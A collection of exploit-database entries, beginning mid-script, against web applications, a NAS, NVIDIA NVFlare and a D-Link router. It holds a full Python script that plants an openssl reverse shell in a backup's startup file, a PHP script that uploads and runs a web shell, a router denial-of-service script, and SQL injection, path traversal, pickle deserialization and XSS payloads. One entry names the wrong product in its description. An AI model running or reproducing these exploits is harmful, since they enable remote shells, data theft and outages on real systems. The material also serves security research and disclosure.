"/cgi-bin/system_mgr.cgi" downloadHeaders = {"content-type": "application/x-www-form-urlencoded"} downloadCmd = "cmd=cgi_backup_conf" try: reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd) except Exception as error: print(error) print("[!] Error while downloading backup") exit(1) # saving to disk try: f = open("backup_clean", "wb") f.write(reqBackup.content) f.close() if not os.path.exists("backup_clean"): print("[!] Error while saving backup") exit(1) except Exception as error: print(error) print("[!] Error while saving backup") exit(1) print("[+] Download successful") # unpack backup (tar.gz file) try: config = tarfile.open("backup_clean") config.extractall() config.close() except Exception as error: print(error) print("[!] Error while unpacking backup") exit(1) # inject stuff into startup script try: bashscript = open("backup/rc.init.sh", "a") # revshell with openssl payload = ( "\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n" % (args.lhost, args.lport) ) bashscript.write(payload) # also start a telnet deamon (has same passwd as web) # bashscript.write("utelnetd -d") bashscript.close() except Exception as error: print(error) print("[!] Error while creating malicious backup") exit(1) print("[+] Created malicious backup") # re pack file try: configInj = tarfile.open("backup_injected", "w:gz") configInj.add("backup") configInj.close() # remove unpacked folder shutil.rmtree("backup", ignore_errors=False, onerror=None) except Exception as error: print(error) print("[!] Error while re-packing malicious backup") exit(1) # upload print("[*] Uploading malicious backup") uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi" uploadHeaders = { "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere" } configInj = open("backup_injected", "rb") tardata = configInj.read().decode("latin-1") uploadBody = ( '------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n' + tardata + "\r\n------WebKitFormBoundaryhellothere--\r\n" ) reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody) if "web/dsk_mgr/wait.html" in reqUpload.text: print("[+] Upload successful, target will reboot now") else: print("[!] Error while uploading malicious backup") exit(1) # creating listener print("[*] Started listener, waiting for the shell to connect back") print("[*] When you are done kill the shell with Ctrl+C") # random name randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10)) # generate the cert and the key for the openssl listener os.system( 'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null' % (randInt, randInt) ) # create an openssl listener os.system( "openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s" % (randInt, randInt, args.lport) ) exit(0)

# Exploit Title: Human Resources Management System v1.0 - Multiple SQLi # Date: 16/03/2023 # Exploit Author: Abdulhakim Öner # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 # Tested on: Windows ## Description A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. ## Request PoC ``` POST /hrm/controller/login.php HTTP/1.1 Host: 192.168.1.103 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.103/hrm/ Content-Type: application/x-www-form-urlencoded Content-Length: 73 [email protected]'&password=test&submit=Sign+In ``` This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. ``` POST /hrm/controller/login.php HTTP/1.1 Host: 192.168.1.103 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.103/hrm/ Content-Type: application/x-www-form-urlencoded Content-Length: 114 [email protected]'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In ``` ## Exploit with sqlmap Save the request from burp to file ``` ┌──(root㉿caesar)-[/home/kali/Workstation/hrm] └─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2 ---snip---- [15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns' POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests: --- Parameter: name (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: [email protected]' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In --- [15:49:36] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.0, Apache 2.4.54, PHP ----snip---- ``` ## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE ## Exploit Author: nu11secur1ty ## Date: 03.17.2023 ## Vendor: https://www.sourcecodester.com/user/257130/activity ## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/ ## Description: The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen. STATUS: CRITICAL Vulnerability [+]Get Info: ```PHP <?php // by nu11secur1ty - 2023 phpinfo(); ?> ``` [+]Exploit: ```PHP <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Proof Of Concept: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi # Date: 19/03/2023 # Exploit Author: Abdulhakim Öner # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html # Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip # Version: 1.0 # Tested on: Windows, Linux ## Description A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands. ## Request PoC ``` GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1 Host: 192.168.1.101 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2 Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v ``` This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works. ``` GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1 Host: 192.168.1.101 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2 Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v ``` ## Exploit with sqlmap Save the request from burp to file ``` sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2 ---snip--- GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests: --- Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY --- [16:00:10] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.54, PHP 8.2.0 ---snip--- ``` ## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.

## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal ## Exploit Author: nu11secur1ty ## Date: 09.29.2022 ## Vendor: https://lavalite.org/ ## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite ## Description: The XSRF-TOKEN cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The payload ../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0= was submitted in the XSRF-TOKEN cookie. The requested file was returned in the application's response. The malicious user can get very sensitive information from this CMS system. STATUS: HIGH Vulnerability [+]Payload: ```POST GET /cms-master/website/public/about.html HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D; lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/cms-master/website/public/ Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+]Response: ```Request <script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script> <script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script> <script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script> <script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script> <script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite) ## Proof and Exploit: [href](https://streamable.com/nis1hg) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle # Exploit Author: Elias Hohl # Google Dork: N/A # Date: 2022-06-21 # Vendor Homepage: https://www.nvidia.com # Software Link: https://github.com/NVIDIA/NVFlare # Version: < 2.1.4 # Tested on: Ubuntu 20.04 # CVE : CVE-2022-34668 https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55 There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients. The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit. The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321'))) REPLICATION This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials). This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server. Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9. sudo apt update sudo apt-get install python3-venv curl python3 -m venv nvflare-env source nvflare-env/bin/activate python3 -m pip install -U pip python3 -m pip install -U setuptools python3 -m pip install torch torchvision tensorboard git clone https://github.com/NVIDIA/NVFlare.git cd NVFlare git checkout 2.1.2 git apply nvflare-exploit-apply.txt # note that this only modifies the client side code python3 -m pip install . cd poc -n 2 mkdir -p poc/admin/transfer cp -rf NVFlare/examples/* poc/admin/transfer In four separate terminals, execute (after running source nvflare-env/bin/activate in each one): ./poc/server/startup/start.sh ./poc/site-1/startup/start.sh ./poc/site-2/startup/start.sh ./poc/admin/startup/fl_admin.sh localhost In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible: nc -lvp 4321 In the admin console, execute: check_status server to verify both clients are connected. Then: submit_job hello-pt-tb It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.

# Exploit Title: DLink DIR 819 A1 - Denial of Service # Date: 30th September, 2022 # Exploit Author: @whokilleddb (https://twitter.com/whokilleddb) # Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router # Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1) # Tested on: Firmware Version - 1.06 Hardware Version - A1 # CVE : CVE-2022-40946 # # Github: https://github.com/whokilleddb/dlink-dir-819-dos # # $ ./exploit.py -i 192.168.0.1 # [+] DLink DIR-819 DoS exploit # [i] Address to attack: 192.168.0.1 # [i] Using SSL: False # [i] Request Timeout: 30s # [i] Buffer Length: 19 # [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522 # [+] Exploit Successful! #!/usr/bin/env python3 import sys import string import urllib3 import requests import argparse import random import socket from rich import print # Disable SSL Warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Globals TIMEOUT = 30 #BUFFER_LEN = 19 BUFFER_LEN = 32 # Class to exploit class Exploit: def __init__(self, ip, is_ssl): """Initialize the constructor""" self.ip = ip self.is_ssl = is_ssl _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}" if self.is_ssl: self.payload = f"https://{_payload}" else: self.payload = f"http://{_payload}" def show(self): """Show the parameters""" print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]") def run(self): """Run the exploit""" print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]") self.show() try: r = requests.get(self.payload, verify=False, timeout=TIMEOUT) if "Internal Error" in r.text: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") print(f"[bold][[green]+[/green]] Router services must be down![/bold]") else: print(f"[bold][[red]![/red]] Exploit Failed :([/bold]") except requests.exceptions.Timeout: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") except Exception as e: print(f"Error occured as: {e}") def main(): """Main function to run""" parser = argparse.ArgumentParser( description="DLink DIR-819 Unauthenticated DoS") parser.add_argument('-i', '--ip', required=True, help="IP of the router") parser.add_argument('-s', '--ssl', required=False, action="store_true") opts = parser.parse_args() try: ip = socket.gethostbyname(opts.ip) except socket.error: print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr) return is_ssl = opts.ssl exploit = Exploit(ip, is_ssl) exploit.run() if __name__ == '__main__': main()

# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution # Date: Sep 30, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.freeguppy.org/ # Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2 # Version: 6.00.10 # Tested on: Linux #!/usr/bin/php <?php $username = "Admin2"; //Administrator username $password = "rose1337"; //Administrator password $options = getopt('u:c:'); if(!isset($options['u'], $options['c'])) die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \n"); $target = $options['u']; $command = $options['c']; // Administrator login $cookie="cookie.txt"; $url = "{$target}guppy/connect.php"; $postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password; $curlObj = curl_init(); curl_setopt($curlObj, CURLOPT_URL, $url); curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curlObj, CURLOPT_HEADER, 1); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false); curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata); curl_setopt ($curlObj, CURLOPT_POST, 1); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True); CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30); CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30); curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie"); curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie"); $result = curl_exec($curlObj); // uploading shell $url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload"; $post='------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="rep" file ------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="ficup"; filename="shell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> ------WebKitFormBoundarygA1APFcUlkIaWal4-- '; $headers = array( 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36', 'Accept-Encoding: gzip, deflate', 'Accept-Language: en-US,en;q=0.9' ); curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers); curl_setopt($curlObj, CURLOPT_URL, $url2); curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post); curl_setopt($curlObj, CURLOPT_POST, true); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True); CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30); CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30); curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie"); curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie"); $data = curl_exec($curlObj); // Executing the shell $shell = "{$target}guppy/file/shell.php?cmd=" .$command; curl_setopt($curlObj, CURLOPT_URL, $shell); curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded')); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); curl_setopt($curlObj, CURLOPT_HEADER, False); curl_setopt($curlObj, CURLOPT_POST, false); $exec_shell = curl_exec($curlObj); $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE); if($code != 200) { echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n"; } else { print("\n"); print($exec_shell); } curl_close($curlObj); ?>

# Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) # Date: 2022-07-02 # Exploit Author: Ali Alipour # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 Pro x64 - XAMPP Server # CVE : CVE-2022-35155 #Issue Detail: The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. # Vulnerable page: /buspassms/download-pass.php # Vulnerable Parameter: searchdata [ POST Data ] #Request : POST /buspassms/download-pass.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3 Origin: https://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: https://127.0.0.1/buspassms/download-pass.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 25 searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search= #Response : HTTP/1.1 200 OK Date: Fri, 01 Jul 2022 00:14:25 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8 X-Powered-By: PHP/7.4.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6425 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <title>Bus Pass Management System || Pass Page</title> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba ...[SNIP]... <h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4> ...[SNIP]...

# Exploit Title: Password Manager for IIS v2.0 - XSS # Exploit Author: VP4TR10T # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/ # Software Link: http://passwordmanager.adiscon.com/ <http://passwordmanager.adiscon.com/> # Version: *Version 2.0 # Tested on: WINDOWS # CVE : CVE-2022-36664 Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1 Affected Parameter in http payload:*ReturnURL*=<script>alert(document.cookie)</script> *Cordially,*

# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3 # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26986 # Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above... # Vendor: https://www.impresscms.org # Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3 ############################################### #Step1- Login with Admin Credentials #Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request): POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1 Host: 192.168.56.117 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701 Content-Length: 1011 Origin: http://192.168.56.117 Connection: close Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3 Upgrade-Insecure-Requests: 1 -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="mimetypeid" 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="extension" bin -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="types" application/octet-stream -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="name" Binary File/Linux Executable -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="icms_page_before_form" http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="op" addmimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="modify_button" Submit -----------------------------40629177308912268471540748701-- Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP) Output: web application technology: Apache 2.4.52, PHP 7.4.27 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) available databases [6]: [*] impresscms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test